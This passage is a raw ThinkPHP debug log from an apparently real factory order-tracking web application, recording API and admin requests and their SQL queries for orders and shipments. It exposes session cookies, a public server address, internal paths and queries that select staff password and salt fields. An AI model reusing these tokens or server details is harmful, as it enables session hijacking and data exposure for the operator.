`orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE ( orderinfo.id in (53632) ) [ RunTime:0.000537s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outbound` [ RunTime:0.000729s ] [ sql ] [ SQL ] SELECT * FROM `ot_outbound` WHERE `factorymge_id` = 26 ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.006437s ] [ sql ] [ SQL ] INSERT INTO `ot_outbound` (`number` , `kehu_id` , `buildstaff_id` , `factorymge_id` , `complete_status` , `createtime`) VALUES ('2512-000062' , 32 , 24 , 26 , '1' , 1765701510) [ RunTime:0.000510s ] [ sql ] [ SQL ] UPDATE `ot_productinfo` SET `kucun`=0,`takeup_kucun`=0,`updatetime`=1765701510 WHERE `id` = 554 [ RunTime:0.000386s ] [ sql ] [ SQL ] UPDATE `ot_orderinfo` SET `sent_amount`=21,`send_amount`=0,`order_status`='4',`updatetime`=1765701510 WHERE `id` = 53632 [ RunTime:0.000323s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outboundandorder` [ RunTime:0.000831s ] [ sql ] [ SQL ] INSERT INTO `ot_outboundandorder` (`outbound_id` , `orderinfo_id` , `kehu_id` , `amount` , `price` , `money` , `productinfo_id` , `factorymge_id` , `staffinfo_id` , `createtime`) VALUES (11836 , 53632 , 32 , 21 , 10.5 , 220.5 , 554 , 26 , 24 , 1765701510) [ RunTime:0.000319s ] --------------------------------------------------------------- [ 2025-12-14T16:38:31+08:00 ] 39.144.91.198 POST /api/order/getrukuorderbyid?staff_id=24&orderStr=&offset=0&pageNum=10 [ info ] 47.105.33.115:8081/api/order/getrukuorderbyid?staff_id=24&orderStr=&offset=0&pageNum=10 [运行时间:0.072829s][吞吐率:13.73req/s] [内存消耗:5,464.64kb] [文件加载:78] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001110s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'order', 2 => 'getrukuorderbyid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=uil72nesf0eb2tbgeshmueif04', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '24', 'orderStr' => '', 'offset' => '0', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001462s ] [ info ] [ RUN ] app\api\controller\Order->getrukuorderbyid[ /alidata/www/gendan/application/api/controller/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000347s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.000804s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000703s ] [ sql ] [ SQL ] SELECT `staffinfo`.`id`,`staffinfo`.`name`,`staffinfo`.`jobmge_id`,`staffinfo`.`accout_num`,`staffinfo`.`phone_num`,`staffinfo`.`accout_pwd`,`staffinfo`.`salt`,`staffinfo`.`staff_status`,`staffinfo`.`admin_id`,`staffinfo`.`factorymge_id`,`staffinfo`.`createtime`,`staffinfo`.`updatetime`,`staffinfo`.`portrait`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime FROM `ot_staffinfo` `staffinfo` LEFT JOIN `ot_factorymge` `factorymge` ON `staffinfo`.`factorymge_id`=`factorymge`.`id` WHERE `staffinfo`.`id` = '24' LIMIT 1 [ RunTime:0.000411s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.000924s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000678s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`factorymge_id` = 26 AND ( orderinfo.order_status in ('1','2','3') ) AND ( productinfo.kucun+orderinfo.produced_amount-orderinfo.send_amount > 0 ) AND `orderinfo`.`pid` = 0 AND ( orderinfo.kehu_id != 0 ) AND ( 1=1 ) AND ( 1=1 ) ORDER BY `orderinfo`.`updatetime` ASC LIMIT 0,10 [ RunTime:0.022731s ] --------------------------------------------------------------- [ 2025-12-14T16:38:31+08:00 ] 39.144.91.198 POST /api/order/getrukuorderbyid?staff_id=24&orderStr=&keywords=&offset=0&pageNum=10 [ info ] 47.105.33.115:8081/api/order/getrukuorderbyid?staff_id=24&orderStr=&keywords=&offset=0&pageNum=10 [运行时间:0.076807s][吞吐率:13.02req/s] [内存消耗:5,464.32kb] [文件加载:78] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000039s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001175s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'order', 2 => 'getrukuorderbyid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=uil72nesf0eb2tbgeshmueif04', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '24', 'orderStr' => '', 'keywords' => '', 'offset' => '0', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001525s ] [ info ] [ RUN ] app\api\controller\Order->getrukuorderbyid[ /alidata/www/gendan/application/api/controller/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000369s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.000835s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000666s ] [ sql ] [ SQL ] SELECT `staffinfo`.`id`,`staffinfo`.`name`,`staffinfo`.`jobmge_id`,`staffinfo`.`accout_num`,`staffinfo`.`phone_num`,`staffinfo`.`accout_pwd`,`staffinfo`.`salt`,`staffinfo`.`staff_status`,`staffinfo`.`admin_id`,`staffinfo`.`factorymge_id`,`staffinfo`.`createtime`,`staffinfo`.`updatetime`,`staffinfo`.`portrait`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime FROM `ot_staffinfo` `staffinfo` LEFT JOIN `ot_factorymge` `factorymge` ON `staffinfo`.`factorymge_id`=`factorymge`.`id` WHERE `staffinfo`.`id` = '24' LIMIT 1 [ RunTime:0.000420s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001085s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000687s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`factorymge_id` = 26 AND ( orderinfo.order_status in ('1','2','3') ) AND ( productinfo.kucun+orderinfo.produced_amount-orderinfo.send_amount > 0 ) AND `orderinfo`.`pid` = 0 AND ( orderinfo.kehu_id != 0 ) AND ( 1=1 ) AND ( 1=1 ) ORDER BY `orderinfo`.`updatetime` ASC LIMIT 0,10 [ RunTime:0.024579s ] --------------------------------------------------------------- [ 2025-12-14T16:38:31+08:00 ] 39.144.91.198 POST /api/order/getrukuorderbyid?staff_id=24&orderStr=&offset=1&pageNum=10 [ info ] 47.105.33.115:8081/api/order/getrukuorderbyid?staff_id=24&orderStr=&offset=1&pageNum=10 [运行时间:0.076079s][吞吐率:13.14req/s] [内存消耗:5,452.38kb] [文件加载:78] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000054s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001244s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'order', 2 => 'getrukuorderbyid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=uil72nesf0eb2tbgeshmueif04', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '24', 'orderStr' => '', 'offset' => '1', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001536s ] [ info ] [ RUN ] app\api\controller\Order->getrukuorderbyid[ /alidata/www/gendan/application/api/controller/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000435s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.000974s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000824s ] [ sql ] [ SQL ] SELECT `staffinfo`.`id`,`staffinfo`.`name`,`staffinfo`.`jobmge_id`,`staffinfo`.`accout_num`,`staffinfo`.`phone_num`,`staffinfo`.`accout_pwd`,`staffinfo`.`salt`,`staffinfo`.`staff_status`,`staffinfo`.`admin_id`,`staffinfo`.`factorymge_id`,`staffinfo`.`createtime`,`staffinfo`.`updatetime`,`staffinfo`.`portrait`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime FROM `ot_staffinfo` `staffinfo` LEFT JOIN `ot_factorymge` `factorymge` ON `staffinfo`.`factorymge_id`=`factorymge`.`id` WHERE `staffinfo`.`id` = '24' LIMIT 1 [ RunTime:0.000554s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001058s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000672s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`factorymge_id` = 26 AND ( orderinfo.order_status in ('1','2','3') ) AND ( productinfo.kucun+orderinfo.produced_amount-orderinfo.send_amount > 0 ) AND `orderinfo`.`pid` = 0 AND ( orderinfo.kehu_id != 0 ) AND ( 1=1 ) AND ( 1=1 ) ORDER BY `orderinfo`.`updatetime` ASC LIMIT 10,10 [ RunTime:0.023827s ] --------------------------------------------------------------- [ 2025-12-14T16:38:45+08:00 ] 39.144.91.198 GET /admin/ordermge/outbound/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%7D&op=%7B%7D&_=1765692324749 [ info ] 47.105.33.115:8081/admin/ordermge/outbound/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%7D&op=%7B%7D&_=1765692324749 [运行时间:0.149792s][吞吐率:6.68req/s] [内存消耗:5,546.20kb] [文件加载:89] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000057s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001218s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'ordermge.outbound', 2 => 'index', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/json', 'referer' => 'http://47.105.33.115:8081/admin/ordermge/outbound?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=99f08b9utof4k5kireqhjmee40', ) [ info ] [ PARAM ] array ( 'sort' => 'id', 'order' => 'desc', 'offset' => '0', 'limit' => '10', 'filter' => '{}', 'op' => '{}', '_' => '1765692324749', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001579s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/ordermge/outbound.php [ info ] [ RUN ] app\admin\controller\ordermge\Outbound->index[ /alidata/www/gendan/application/admin/controller/ordermge/Outbound.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000127s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000477s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.000697s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='39' and ag.status='normal' ) [ RunTime:0.000433s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.000601s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (191,337,233,177,190) [ RunTime:0.000373s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outbound` [ RunTime:0.000851s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000606s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.000670s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000705s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_outbound` `outbound` LEFT JOIN `ot_factorymge` `factorymge` ON `outbound`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_staffinfo` `buildstaff` ON `outbound`.`buildstaff_id`=`buildstaff`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outbound`.`kehu_id`=`kehu`.`id` WHERE `outbound`.`factorymge_id` = '26' ORDER BY `outbound`.`id` DESC LIMIT 1 [ RunTime:0.009215s ] [ sql ] [ SQL ] SELECT `outbound`.`id`,`outbound`.`number`,`outbound`.`kehu_id`,`outbound`.`total_money`,`outbound`.`buildstaff_id`,`outbound`.`staffinfo_id`,`outbound`.`factorymge_id`,`outbound`.`complete_status`,`outbound`.`admin_id`,`outbound`.`is_print`,`outbound`.`createtime`,`outbound`.`updatetime`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,buildstaff.id AS buildstaff__id,buildstaff.name AS buildstaff__name,buildstaff.jobmge_id AS buildstaff__jobmge_id,buildstaff.accout_num AS buildstaff__accout_num,buildstaff.phone_num AS buildstaff__phone_num,buildstaff.accout_pwd AS buildstaff__accout_pwd,buildstaff.salt AS buildstaff__salt,buildstaff.staff_status AS buildstaff__staff_status,buildstaff.admin_id AS buildstaff__admin_id,buildstaff.factorymge_id AS buildstaff__factorymge_id,buildstaff.createtime AS buildstaff__createtime,buildstaff.updatetime AS buildstaff__updatetime,buildstaff.portrait AS buildstaff__portrait,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime FROM `ot_outbound` `outbound` LEFT JOIN `ot_factorymge` `factorymge` ON `outbound`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_staffinfo` `buildstaff` ON `outbound`.`buildstaff_id`=`buildstaff`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outbound`.`kehu_id`=`kehu`.`id` WHERE `outbound`.`factorymge_id` = '26' ORDER BY `outbound`.`id` DESC LIMIT 0,10 [ RunTime:0.001024s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outboundandorder` [ RunTime:0.000973s ] [ sql ] [ SQL ] SELECT sum(amount) as totalAmount,sum(money) as totalMoney FROM `ot_outboundandorder` WHERE `outbound_id` = 11836 LIMIT 1 [ RunTime:0.008031s ] [ sql ] [ SQL ] SELECT sum(amount) as totalAmount,sum(money) as totalMoney FROM `ot_outboundandorder` WHERE `outbound_id` = 11835 LIMIT 1 [ RunTime:0.007115s ] [ sql ] [ SQL ] SELECT sum(amount) as totalAmount,sum(money) as totalMoney FROM `ot_outboundandorder` WHERE `outbound_id` = 11834 LIMIT 1 [ RunTime:0.007748s ] [ sql ] [ SQL ] SELECT sum(amount) as totalAmount,sum(money) as totalMoney FROM `ot_outboundandorder` WHERE `outbound_id` = 11833 LIMIT 1 [ RunTime:0.007421s ] [ sql ] [ SQL ] SELECT sum(amount) as totalAmount,sum(money) as totalMoney FROM `ot_outboundandorder` WHERE `outbound_id` = 11832 LIMIT 1 [ RunTime:0.007345s ] [ sql ] [ SQL ] SELECT sum(amount) as totalAmount,sum(money) as totalMoney FROM `ot_outboundandorder` WHERE `outbound_id` = 11818 LIMIT 1 [ RunTime:0.007626s ] [ sql ] [ SQL ] SELECT sum(amount) as totalAmount,sum(money) as totalMoney FROM `ot_outboundandorder` WHERE `outbound_id` = 11817 LIMIT 1 [ RunTime:0.007409s ] [ sql ] [ SQL ] SELECT sum(amount) as totalAmount,sum(money) as totalMoney FROM `ot_outboundandorder` WHERE `outbound_id` = 11816 LIMIT 1 [ RunTime:0.007135s ] [ sql ] [ SQL ] SELECT sum(amount) as totalAmount,sum(money) as totalMoney FROM `ot_outboundandorder` WHERE `outbound_id` = 11815 LIMIT 1 [ RunTime:0.007158s ] [ sql ] [ SQL ] SELECT sum(amount) as totalAmount,sum(money) as totalMoney FROM `ot_outboundandorder` WHERE `outbound_id` = 11810 LIMIT 1 [ RunTime:0.010091s ] --------------------------------------------------------------- [ 2025-12-14T16:38:49+08:00 ] 39.144.91.198 GET /admin/ordermge/outbound/printout/ids/11836?dialog=1 [ info 